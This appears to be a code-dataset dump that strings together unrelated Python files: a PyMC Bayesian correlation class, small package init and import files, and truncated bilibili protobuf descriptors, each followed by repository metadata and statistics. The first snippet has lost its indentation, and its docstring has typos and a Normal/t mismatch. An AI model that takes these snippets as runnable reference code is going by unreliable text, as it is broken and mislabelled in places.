data : float, (n_points, n_dim) array_like
The multidimensional dataset to infer correlations on.
sigma: float, (n_points, n_dim) array_like
The uncertainties of the multidimensional dataset to infer correlations on.
mu_prior : length-2 or (2, ndim) iterable of floats, optional, default (0., 1000.)
The mean and standard deviation of the Gaussian prior on the multivariate t distribution
sigma_prior : scalar or (ndim) iterable of floats, optional, default 200.
The prior on the scale parameter (beta) of the half-Cauchy prior on the standard deviations of the multivariate t distribution
Attributes
----------
None
Methods
--------
fit : Fit the data assuming they are drawn from a multivariate Normal distribution
summarise : summarise the results of the fit
plot_trace : plot the trace and marginal distributions of the trace
plot_data : plot the data overlaid with the ellipse described by the inferred correlated multivariate Normal
plot_corner : plot the 1D and 2D marginal distributions of the inferred parameters.
Examples
--------
Creating an instance is as simple as
>>> import pybaycor as pbc
>>> bc = pbc.BayesianCorrelation(data=data)
Once you have created the instances, the fit is run with
>>> bc.fit()
or you can modify the length of burn-in and number of steps with
>>> bc.fit(steps=2000, tune=2000)
Once you are happy with the fit, you can get a tabular summary with
>>> summary = bc.summarise()
and visual summaries with
>>> bc.plot_trace()
>>> bc.plot_corner()
>>> bc,plot_data()
"""
def __init__(self, data, sigma, mu_prior=[0.0,1000.], sigma_prior=200.):
self.fitted=False
if np.any(sigma <=0.):
raise ValueError("Uncertainties must be positive real numbers!")
self.plot_trace_vars = ['mu', "nu", "chol_corr"]
if data is None:
raise ValueError("Either data must be given as input, or x and y")
else:
self.ndim = data.shape[1]
self.npoints = data.shape[0]
self.data = data
if data.shape != sigma.shape:
raise RuntimeError("data and sigma must have the same shape!")
self.sigma = sigma
self.model = pm.Model()
with self.model:
#we put weakly informative hyperpriors on the means and standard deviations of the multivariate normal distribution
mu = pm.Normal("mu", mu=mu_prior[0], sigma=mu_prior[1], shape=self.ndim)
sigma = pm.HalfCauchy.dist(sigma_prior)
#and a hyperprior on the covariance matrix which weakly penalises strong correlations
chol, corr, stds = pm.LKJCholeskyCov("chol", n=self.ndim, eta=2.0, sd_dist=sigma, compute_corr=True)
#the hyperprior gives us the Cholesky Decomposition of the covariance matrix, so for completeness we can calculate that determinisitically
cov = pm.Deterministic("cov", chol.dot(chol.T))
nuMinusOne = pm.Exponential('nu-1', lam=1./29.)
nu = pm.Deterministic('nu', nuMinusOne + 1)
#and now we can construct our multivariate t distribituions to complete the prior
prior = pm.MvStudentT('vals', nu = nu, mu=mu, chol=chol, shape=(self.npoints,self.ndim)) #, observed=self.data)
#print(prior)
#help(prior)
mu1s = prior[:,0]
#Finally, we need to define our data
for i in range(self.ndim):
pm.Normal("data_"+str(i), mu=prior[:,i], sigma = self.sigma[:,i], observed=self.data[:,i])
| 39.206897 | 244 | 0.584636 | 3,863 | 29,562 | 4.391147 | 0.104841 | 0.021694 | 0.008253 | 0.013795 | 0.846489 | 0.832636 | 0.819784 | 0.800271 | 0.791487 | 0.782409 | 0 | 0.02024 | 0.314762 | 29,562 | 753 | 245 | 39.258964 | 0.81715 | 0.416548 | 0 | 0.713376 | 0 | 0 | 0.069055 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.038217 | false | 0.009554 | 0.025478 | 0 | 0.089172 | 0.025478 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
6801cc99daf52e70ae86d48f358624f9815cd0e5 | 99 | py | Python | instapy_bot/cli/__init__.py | 7aske/instapy-bot | 5bcd6fdd3e54671a91f1687f6fd77fe90ce04e99 | [
"RSA-MD"
] | 9 | 2019-03-28T21:00:48.000Z | 2021-11-16T01:15:01.000Z | instapy_bot/cli/__init__.py | 7aske/instapy-bot | 5bcd6fdd3e54671a91f1687f6fd77fe90ce04e99 | [
"RSA-MD"
] | 1 | 2021-03-01T22:43:34.000Z | 2021-03-19T20:03:42.000Z | instapy_bot/cli/__init__.py | 7aske/instapy-bot | 5bcd6fdd3e54671a91f1687f6fd77fe90ce04e99 | [
"RSA-MD"
] | 5 | 2019-10-19T10:27:41.000Z | 2022-03-20T12:31:03.000Z | from instapy_bot.cli.cli import Cli
def client(*args, **kwargs):
return Cli(*args, **kwargs)
| 16.5 | 35 | 0.686869 | 15 | 99 | 4.466667 | 0.666667 | 0.298507 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.161616 | 99 | 5 | 36 | 19.8 | 0.807229 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | true | 0 | 0.333333 | 0.333333 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 1 | 1 | 0 | 0 | 8 |
6810faa7171171dbf2759cdfd47cf253e65f22dd | 101 | py | Python | pycalphad/refdata.py | amkrajewski/pycalphad | 313bf8042ff415abfcf979cb8a0491b8612ef96a | [
"MIT"
] | 2 | 2021-06-16T19:46:35.000Z | 2021-11-17T11:13:56.000Z | pycalphad/refdata.py | amkrajewski/pycalphad | 313bf8042ff415abfcf979cb8a0491b8612ef96a | [
"MIT"
] | null | null | null | pycalphad/refdata.py | amkrajewski/pycalphad | 313bf8042ff415abfcf979cb8a0491b8612ef96a | [
"MIT"
] | null | null | null | raise ImportError('pycalphad.refdata has been moved to ESPEI. Please install ESPEI 0.3.1 or later.')
| 50.5 | 100 | 0.782178 | 17 | 101 | 4.647059 | 0.941176 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.034091 | 0.128713 | 101 | 1 | 101 | 101 | 0.863636 | 0 | 0 | 0 | 0 | 0 | 0.782178 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
68165809943b3d7495b1074e1e48cd689254e1e3 | 1,063 | py | Python | rastervision/evaluation/__init__.py | carderne/raster-vision | 915fbcd3263d8f2193e65c2cd0eb53e050a47a01 | [
"Apache-2.0"
] | 4 | 2019-03-11T12:38:15.000Z | 2021-04-06T14:57:52.000Z | rastervision/evaluation/__init__.py | carderne/raster-vision | 915fbcd3263d8f2193e65c2cd0eb53e050a47a01 | [
"Apache-2.0"
] | null | null | null | rastervision/evaluation/__init__.py | carderne/raster-vision | 915fbcd3263d8f2193e65c2cd0eb53e050a47a01 | [
"Apache-2.0"
] | 1 | 2020-04-27T15:21:53.000Z | 2020-04-27T15:21:53.000Z | # flake8: noqa
from rastervision.evaluation.evaluation_item import *
from rastervision.evaluation.class_evaluation_item import *
from rastervision.evaluation.evaluator import *
from rastervision.evaluation.evaluator_config import *
from rastervision.evaluation.classification_evaluation import *
from rastervision.evaluation.chip_classification_evaluation import *
from rastervision.evaluation.object_detection_evaluation import *
from rastervision.evaluation.semantic_segmentation_evaluation import *
from rastervision.evaluation.classification_evaluator import *
from rastervision.evaluation.classification_evaluator_config import *
from rastervision.evaluation.chip_classification_evaluator import *
from rastervision.evaluation.chip_classification_evaluator_config import *
from rastervision.evaluation.object_detection_evaluator import *
from rastervision.evaluation.object_detection_evaluator_config import *
from rastervision.evaluation.semantic_segmentation_evaluator import *
from rastervision.evaluation.semantic_segmentation_evaluator_config import *
| 55.947368 | 76 | 0.888993 | 111 | 1,063 | 8.252252 | 0.144144 | 0.279476 | 0.454148 | 0.524017 | 0.94214 | 0.875546 | 0.422489 | 0 | 0 | 0 | 0 | 0.001005 | 0.06397 | 1,063 | 18 | 77 | 59.055556 | 0.919598 | 0.011289 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
a881205d8cf3aae3d50703a0043306acd5c161e5 | 164 | py | Python | service/pk_service.py | leexinhao/boya-backend | 3c0cf265f4b37312ead5e62be0fd81757c4f59dd | [
"Apache-2.0"
] | null | null | null | service/pk_service.py | leexinhao/boya-backend | 3c0cf265f4b37312ead5e62be0fd81757c4f59dd | [
"Apache-2.0"
] | null | null | null | service/pk_service.py | leexinhao/boya-backend | 3c0cf265f4b37312ead5e62be0fd81757c4f59dd | [
"Apache-2.0"
] | 1 | 2022-03-12T03:40:00.000Z | 2022-03-12T03:40:00.000Z | from service.utils import generate_verification_code
def gen_key_service(code_len=6):
"""
随机生成六位验证码
"""
return generate_verification_code(code_len) | 27.333333 | 52 | 0.756098 | 21 | 164 | 5.52381 | 0.666667 | 0.344828 | 0.413793 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.007299 | 0.164634 | 164 | 6 | 53 | 27.333333 | 0.839416 | 0.054878 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0 | 0.333333 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
a8c9234a0cc2b97ddac308d4ad3f77b38a9a35c4 | 39,254 | py | Python | bilibili/app/archive/v1/archive_pb2.py | Privoce/all-in-danmaku-server | b13bd3dae26d65540b7cf5c3d8ef3569111d1676 | [
"MIT"
] | null | null | null | bilibili/app/archive/v1/archive_pb2.py | Privoce/all-in-danmaku-server | b13bd3dae26d65540b7cf5c3d8ef3569111d1676 | [
"MIT"
] | null | null | null | bilibili/app/archive/v1/archive_pb2.py | Privoce/all-in-danmaku-server | b13bd3dae26d65540b7cf5c3d8ef3569111d1676 | [
"MIT"
] | 2 | 2021-07-14T06:34:39.000Z | 2021-07-14T07:30:12.000Z | # -*- coding: utf-8 -*-
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: bilibili/app/archive/v1/archive.proto
"""Generated protocol buffer code."""
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
DESCRIPTOR = _descriptor.FileDescriptor(
name='bilibili/app/archive/v1/archive.proto',
package='bilibili.app.archive.v1',
syntax='proto3',
serialized_options=None,
create_key=_descriptor._internal_create_key,
serialized_pb=b'\n%bilibili/app/archive/v1/archive.proto\x12\x17\x62ilibili.app.archive.v1\"\xa7\x05\n\x03\x41rc\x12\x0b\n\x03\x61id\x18\x01 \x01(\x03\x12\x0e\n\x06videos\x18\x02 \x01(\x03\x12\x0e\n\x06typeId\x18\x03 \x01(\x05\x12\x10\n\x08typeName\x18\x04 \x01(\t\x12\x11\n\tcopyright\x18\x05 \x01(\x05\x12\x0b\n\x03pic\x18\x06 \x01(\t\x12\r\n\x05title\x18\x07 \x01(\t\x12\x0f\n\x07pubdate\x18\x08 \x01(\x03\x12\r\n\x05\x63time\x18\t \x01(\x03\x12\x0c\n\x04\x64\x65sc\x18\n \x01(\t\x12\r\n\x05state\x18\x0b \x01(\x05\x12\x0e\n\x06\x61\x63\x63\x65ss\x18\x0c \x01(\x05\x12\x11\n\tattribute\x18\r \x01(\x05\x12\x0b\n\x03tag\x18\x0e \x01(\t\x12\x0c\n\x04tags\x18\x0f \x03(\t\x12\x10\n\x08\x64uration\x18\x10 \x01(\x03\x12\x11\n\tmissionId\x18\x11 \x01(\x03\x12\x0f\n\x07orderId\x18\x12 \x01(\x03\x12\x13\n\x0bredirectUrl\x18\x13 \x01(\t\x12\x0f\n\x07\x66orward\x18\x14 \x01(\x03\x12/\n\x06rights\x18\x15 \x01(\x0b\x32\x1f.bilibili.app.archive.v1.Rights\x12/\n\x06\x61uthor\x18\x16 \x01(\x0b\x32\x1f.bilibili.app.archive.v1.Author\x12+\n\x04stat\x18\x17 \x01(\x0b\x32\x1d.bilibili.app.archive.v1.Stat\x12\x14\n\x0creportResult\x18\x18 \x01(\t\x12\x0f\n\x07\x64ynamic\x18\x19 \x01(\t\x12\x10\n\x08\x66irstCid\x18\x1a \x01(\x03\x12\x35\n\tdimension\x18\x1b \x01(\x0b\x32\".bilibili.app.archive.v1.Dimension\x12\x35\n\tstaffInfo\x18\x1c \x03(\x0b\x32\".bilibili.app.archive.v1.StaffInfo\x12\x10\n\x08seasonId\x18\x1d \x01(\x03\x12\x13\n\x0b\x61ttributeV2\x18\x1e \x01(\x03\"1\n\x06\x41uthor\x12\x0b\n\x03mid\x18\x01 \x01(\x03\x12\x0c\n\x04name\x18\x02 \x01(\t\x12\x0c\n\x04\x66\x61\x63\x65\x18\x03 \x01(\t\":\n\tDimension\x12\r\n\x05width\x18\x01 \x01(\x03\x12\x0e\n\x06height\x18\x02 \x01(\x03\x12\x0e\n\x06rotate\x18\x03 \x01(\x03\"\xb2\x01\n\x04Page\x12\x0b\n\x03\x63id\x18\x01 \x01(\x03\x12\x0c\n\x04page\x18\x02 \x01(\x05\x12\x0c\n\x04\x66rom\x18\x03 \x01(\t\x12\x0c\n\x04part\x18\x04 \x01(\t\x12\x10\n\x08\x64uration\x18\x05 \x01(\x03\x12\x0b\n\x03vid\x18\x06 \x01(\t\x12\x0c\n\x04\x64\x65sc\x18\x07 \x01(\t\x12\x0f\n\x07webLink\x18\x08 \x01(\t\x12\x35\n\tdimension\x18\t \x01(\x0b\x32\".bilibili.app.archive.v1.Dimension\"\xd6\x01\n\x06Rights\x12\n\n\x02\x62p\x18\x01 \x01(\x05\x12\x0c\n\x04\x65lec\x18\x02 \x01(\x05\x12\x10\n\x08\x64ownload\x18\x03 \x01(\x05\x12\r\n\x05movie\x18\x04 \x01(\x05\x12\x0b\n\x03pay\x18\x05 \x01(\x05\x12\x0b\n\x03hd5\x18\x06 \x01(\x05\x12\x11\n\tnoReprint\x18\x07 \x01(\x05\x12\x10\n\x08\x61utoplay\x18\x08 \x01(\x05\x12\x0e\n\x06ugcPay\x18\t \x01(\x05\x12\x15\n\risCooperation\x18\n \x01(\x05\x12\x15\n\rugcPayPreview\x18\x0b \x01(\x05\x12\x14\n\x0cnoBackground\x18\x0c \x01(\x05\":\n\tStaffInfo\x12\x0b\n\x03mid\x18\x01 \x01(\x03\x12\r\n\x05title\x18\x02 \x01(\t\x12\x11\n\tattribute\x18\x03 \x01(\x03\"\xac\x01\n\x04Stat\x12\x0b\n\x03\x61id\x18\x01 \x01(\x03\x12\x0c\n\x04view\x18\x02 \x01(\x05\x12\x0f\n\x07\x64\x61nmaku\x18\x03 \x01(\x05\x12\r\n\x05reply\x18\x04 \x01(\x05\x12\x0b\n\x03\x66\x61v\x18\x05 \x01(\x05\x12\x0c\n\x04\x63oin\x18\x06 \x01(\x05\x12\r\n\x05share\x18\x07 \x01(\x05\x12\x0f\n\x07nowRank\x18\x08 \x01(\x05\x12\x0f\n\x07hisRank\x18\t \x01(\x05\x12\x0c\n\x04like\x18\n \x01(\x05\x12\x0f\n\x07\x64islike\x18\x0b \x01(\x05\x62\x06proto3'
)
_ARC = _descriptor.Descriptor(
name='Arc',
full_name='bilibili.app.archive.v1.Arc',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='aid', full_name='bilibili.app.archive.v1.Arc.aid', index=0,
number=1, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='videos', full_name='bilibili.app.archive.v1.Arc.videos', index=1,
number=2, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='typeId', full_name='bilibili.app.archive.v1.Arc.typeId', index=2,
number=3, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='typeName', full_name='bilibili.app.archive.v1.Arc.typeName', index=3,
number=4, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='copyright', full_name='bilibili.app.archive.v1.Arc.copyright', index=4,
number=5, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='pic', full_name='bilibili.app.archive.v1.Arc.pic', index=5,
number=6, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='title', full_name='bilibili.app.archive.v1.Arc.title', index=6,
number=7, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='pubdate', full_name='bilibili.app.archive.v1.Arc.pubdate', index=7,
number=8, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='ctime', full_name='bilibili.app.archive.v1.Arc.ctime', index=8,
number=9, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='desc', full_name='bilibili.app.archive.v1.Arc.desc', index=9,
number=10, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='state', full_name='bilibili.app.archive.v1.Arc.state', index=10,
number=11, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='access', full_name='bilibili.app.archive.v1.Arc.access', index=11,
number=12, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='attribute', full_name='bilibili.app.archive.v1.Arc.attribute', index=12,
number=13, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='tag', full_name='bilibili.app.archive.v1.Arc.tag', index=13,
number=14, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='tags', full_name='bilibili.app.archive.v1.Arc.tags', index=14,
number=15, type=9, cpp_type=9, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='duration', full_name='bilibili.app.archive.v1.Arc.duration', index=15,
number=16, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='missionId', full_name='bilibili.app.archive.v1.Arc.missionId', index=16,
number=17, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='orderId', full_name='bilibili.app.archive.v1.Arc.orderId', index=17,
number=18, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='redirectUrl', full_name='bilibili.app.archive.v1.Arc.redirectUrl', index=18,
number=19, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='forward', full_name='bilibili.app.archive.v1.Arc.forward', index=19,
number=20, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='rights', full_name='bilibili.app.archive.v1.Arc.rights', index=20,
number=21, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='author', full_name='bilibili.app.archive.v1.Arc.author', index=21,
number=22, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='stat', full_name='bilibili.app.archive.v1.Arc.stat', index=22,
number=23, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='reportResult', full_name='bilibili.app.archive.v1.Arc.reportResult', index=23,
number=24, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='dynamic', full_name='bilibili.app.archive.v1.Arc.dynamic', index=24,
number=25, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='firstCid', full_name='bilibili.app.archive.v1.Arc.firstCid', index=25,
number=26, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='dimension', full_name='bilibili.app.archive.v1.Arc.dimension', index=26,
number=27, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='staffInfo', full_name='bilibili.app.archive.v1.Arc.staffInfo', index=27,
number=28, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='seasonId', full_name='bilibili.app.archive.v1.Arc.seasonId', index=28,
number=29, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='attributeV2', full_name='bilibili.app.archive.v1.Arc.attributeV2', index=29,
number=30, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=67,
serialized_end=746,
)
_AUTHOR = _descriptor.Descriptor(
name='Author',
full_name='bilibili.app.archive.v1.Author',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='mid', full_name='bilibili.app.archive.v1.Author.mid', index=0,
number=1, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='name', full_name='bilibili.app.archive.v1.Author.name', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='face', full_name='bilibili.app.archive.v1.Author.face', index=2,
number=3, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=748,
serialized_end=797,
)
_DIMENSION = _descriptor.Descriptor(
name='Dimension',
full_name='bilibili.app.archive.v1.Dimension',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='width', full_name='bilibili.app.archive.v1.Dimension.width', index=0,
number=1, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='height', full_name='bilibili.app.archive.v1.Dimension.height', index=1,
number=2, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='rotate', full_name='bilibili.app.archive.v1.Dimension.rotate', index=2,
number=3, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=799,
serialized_end=857,
)
_PAGE = _descriptor.Descriptor(
name='Page',
full_name='bilibili.app.archive.v1.Page',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='cid', full_name='bilibili.app.archive.v1.Page.cid', index=0,
number=1, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='page', full_name='bilibili.app.archive.v1.Page.page', index=1,
number=2, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
